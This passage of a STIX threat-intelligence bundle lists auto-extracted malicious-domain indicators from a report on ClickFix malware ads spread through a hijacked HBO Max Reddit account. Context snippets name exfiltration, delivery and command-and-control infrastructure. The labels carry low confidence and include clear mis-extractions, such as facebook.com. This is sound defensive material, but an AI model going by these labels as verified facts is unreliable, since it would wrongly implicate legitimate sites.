News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--761cd692-b4ea-4da6-9d6b-cd7521bf9055","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: congiagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: wantsellonline[.]com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; ce","pattern":"[domain-name:value = 'congiagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a9832b92-36b7-4d90-a3ea-03a7211b616f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: cosimcagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: .]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; broadwalkindia[.]com; cim-kolea[.]com;","pattern":"[domain-name:value = 'cosimcagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2bbafaf7-7e07-4953-a196-251438d91fa0","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: crisp-paths.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: abar55[.]namebright[.]bike SIC Windows-route domains Domain crisp-paths[.]com; cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]c","pattern":"[domain-name:value = 'crisp-paths.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0a58ea8e-c143-42b9-8d05-ff6d6ca31005","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: denverplumbingandwaterheater.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: vmaster[.]com; pinescope11[.]com; dogtrainersgeorgia[.]com; denverplumbingandwaterheater[.]com; restoremental[.]com; glowmedaesthetics[.]com; marbellare","pattern":"[domain-name:value = 'denverplumbingandwaterheater.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fd1e3333-bd55-486c-b3f3-a864321f6134","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: desktop-version.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: pla[.]com; glrack[.]com Fake wallet delivery domains Domain desktop-version[.]com; oakenfjrod[.]ru Windows staging domains Domain sic180[.]","pattern":"[domain-name:value = 'desktop-version.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9f995715-87f3-43cf-a485-09f915696619","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: dogtrainersgeorgia.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: dscapelighting[.]com; aidevmaster[.]com; pinescope11[.]com; dogtrainersgeorgia[.]com; denverplumbingandwaterheater[.]com; restoremental[.]com;","pattern":"[domain-name:value = 'dogtrainersgeorgia.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b0b03b77-0a34-47cb-a5b7-57e4d298e4fe","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: ember-bridge.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: com macOS loader-delivery domains Domain weaveridge7[.]com; ember-bridge[.]com; rudder-moss[.]com; wuess[.]com September macOS telemetry","pattern":"[domain-name:value = 'ember-bridge.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c3773dbb-eff9-449d-a0f1-e2d12cf1c809","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: facebook.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 3 Amatera direct-to-IP TLS command-and-control server using facebook[.]com SNI IP address 165.22.199[.]85 September macOS telemetry","pattern":"[domain-name:value = 'facebook.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--92e7a4b1-19a8-498a-8eb9-e47f9a977dfc","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: fern-plume.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: y and control domains Domain arkypc[.]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov","pattern":"[domain-name:value = 'fern-plume.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--01988136-f071-4450-a2c9-a1a15403770e","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: filequanticore.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ss 38.244.158[.]56 AMOS helper /contact exfiltration Domain filequanticore[.]com; filesiriuscore[.]com; alfredaps[.]com; hbomaxx[.]us; hbo","pattern":"[domain-name:value = 'filequanticore.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4af23e7f-b84d-4059-adb2-531421a98b1c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: filesiriuscore.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: S helper /contact exfiltration Domain filequanticore[.]com; filesiriuscore[.]com; alfredaps[.]com; hbomaxx[.]us; hbomax-macos[.]com; brigh","pattern":"[domain-name:value = 'filesiriuscore.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b424f2a9-7659-49de-bf8b-8753769b8056","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: flutelikelurkerunsinewy.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ; clean-disk-guide[.]com Copied-command lure domains Domain flutelikelurkerunsinewy[.]com; camaligsalvatrefoils[.]com Click-tracking domains Domain","pattern":"[domain-name:value = 'flutelikelurkerunsinewy.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b4a21c23-52fa-44b2-b9de-3454d54a2333","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: gatemaden.space","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ntal[.]com; glowmedaesthetics[.]com; marbellaresales[.]com; gatemaden[.]space; beaocnagent[.]com; hbubagent[.]com MacSync delivery and","pattern":"[domain-name:value = 'gatemaden.space']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--381925ab-f0f5-4c3d-82b0-8a42e369698f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: getnova.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: us Provisioning-linked lure domains Domain applediag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-la","pattern":"[domain-name:value = 'getnova.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6b4ddff4-017b-42a8-9c0f-b2601400bc29","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: gigappyworld.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: Domain chatgpt-safepage[.]com; thepullmanfolkestone[.]com; gigappyworld[.]com; microsoftupdater[.]info; gogolfonline[.]com; heroestales","pattern":"[domain-name:value = 'gigappyworld.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ca57a7b8-56e9-46e8-82c3-ecb84a307c96","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: glowmedaesthetics.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: m; denverplumbingandwaterheater[.]com; restoremental[.]com; glowmedaesthetics[.]com; marbellaresales[.]com; gatemaden[.]space; beaocnagent[.]","pattern":"[domain-name:value = 'glowmedaesthetics.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--99b46e88-ec1e-47d8-bfcf-1980c52c2c50","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: glrack.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: and tasking domains Domain loop-lumen[.]com; umapla[.]com; glrack[.]com Fake wallet delivery domains Domain desktop-version[.]com","pattern":"[domain-name:value = 'glrack.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--45071ed7-8c15-4848-aa71-c75305606cfb","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: gogolfonline.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: kestone[.]com; gigappyworld[.]com; microsoftupdater[.]info; gogolfonline[.]com; heroestales[.]com; wantsellonline[.]com; papartybus[.]co","pattern":"[domain-name:value = 'gogolfonline.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--63a554d6-c70f-4f66-9cc4-36c6a2b83228","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: grove-12.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: .]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com","pattern":"[domain-name:value = 'grove-12.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6cee10ad-7166-4415-beec-6d40379ed9ef","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: habar55.namebright.bike","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: akenfjrod[.]ru Windows staging domains Domain sic180[.]com; habar55[.]namebright[.]bike SIC Windows-route domains Domain crisp-paths[.]com; cli","pattern":"[domain-name:value = 'habar55.namebright.bike']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--63d64166-063b-4b6d-b09b-32fae86fdb71","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: harbor-29.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: m MacSync delivery and control domains Domain arkypc[.]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; vers","pattern":"[domain-name:value = 'harbor-29.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2d086637-74ac-476e-9094-e7fa95c9c487","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hbomax-macos.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ean-disk-guide[.]com, 11 for code-desktop[.]com and six for hbomax-macos[.]com. The compromised account gave the actors a trusted advert","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--16249b80-fadb-4e60-a871-1ce19cda7563","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hbomaxx.app","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: blocked. Ads included 40 streaming-themed placements using hbomaxx[.]app, 36 developer-focused ads linked to codex-craft[.]com, 15","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4592985f-8621-427e-9ff5-21648fa01096","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hbomaxx.us","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: rs run attacker code. The fraudulent landing page hosted at hbomaxx[.]us (Source – HudsonRock) The operators moved quickly as doma","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fb6486d4-de99-44ed-bd48-4d0d44400768","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hbubagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: arbellaresales[.]com; gatemaden[.]space; beaocnagent[.]com; hbubagent[.]com MacSync delivery and control domains Domain arkypc[.]com;","pattern":"[domain-name:value = 'hbubagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ee6ade77-94b7-4467-8beb-50c57d06a816","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: heroestales.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: pyworld[.]com; microsoftupdater[.]info; gogolfonline[.]com; heroestales[.]com; wantsellonline[.]com; papartybus[.]com; clveeragent[.]co","pattern":"[domain-name:value = 'heroestales.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bb862ee0-8592-480d-96ea-34fd37c771ec","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: homebrwmac-hub.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: adesktop[.]gitlab[.]io; cli-desktop[.]com; cli-stack[.]com; homebrwmac-hub[.]com; clean-disk-guide[.]com Copied-command lure domains Domai","pattern":"[domain-name:value = 'homebrwmac-hub.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7fa38fca-35e6-4bdc-acb1-da639a54b10a","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: houstongaragedoorinstallers.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: .]com September macOS telemetry and delivery domains Domain houstongaragedoorinstallers[.]com; pressureulcerlawyer[.]com; lalandscapelighting[.]com; ai","pattern":"[domain-name:value = 'houstongaragedoorinstallers.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--43fb1abe-d10d-4e09-87e6-dd03253ad3c0","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: lakhov.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: me[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AMOS helper and","pattern":"[domain-name:value = 'lakhov.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0a1d6e63-a002-4618-9b02-5a33b3a5b977","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: lalandscapelighting.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ustongaragedoorinstallers[.]com; pressureulcerlawyer[.]com; lalandscapelighting[.]com; aidevmaster[.]com; pinescope11[.]com; dogtrainersgeorgia","pattern":"[domain-name:value = 'lalandscapelighting.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--407ce5b8-ea41-4ed4-bded-09a3a75bf010","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: leaf68.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: trefoils[.]com Click-tracking domains Domain press29[.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; p","pattern":"[domain-name:value = 'leaf68.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6dfaf3e4-4833-4f8a-acf6-cf0f2473938b","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: loop-lumen.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: [.]com; aforvm[.]com AMOS helper and tasking domains Domain loop-lumen[.]com; umapla[.]com; glrack[.]com Fake wallet delivery domains","pattern":"[domain-name:value = 'loop-lumen.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3533112a-6a11-4afd-b4f8-180f7ce7ce1f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: macdeveloperhub.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: s-route domains Domain crisp-paths[.]com; cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com;","pattern":"[domain-name:value = 'macdeveloperhub.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bc2186dd-b640-454d-a354-a66c9556157a","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: macfixguide.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: crisp-paths[.]com; cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rec","pattern":"[domain-name:value = 'macfixguide.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b4c438ce-550a-4338-ade6-6375667ebf48","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: macstoragetips.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: va-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstoragetips[.]com Provisioning-neighborhood domains Domain chatgpt-safepage","pattern":"[domain-name:value = 'macstoragetips.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dc4af852-8b3c-4d03-8355-59897eee8aa7","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: marbellaresales.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: heater[.]com; restoremental[.]com; glowmedaesthetics[.]com; marbellaresales[.]com; gatemaden[.]space; beaocnagent[.]com; hbubagent[.]com Ma","pattern":"[domain-name:value = 'marbellaresales.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security 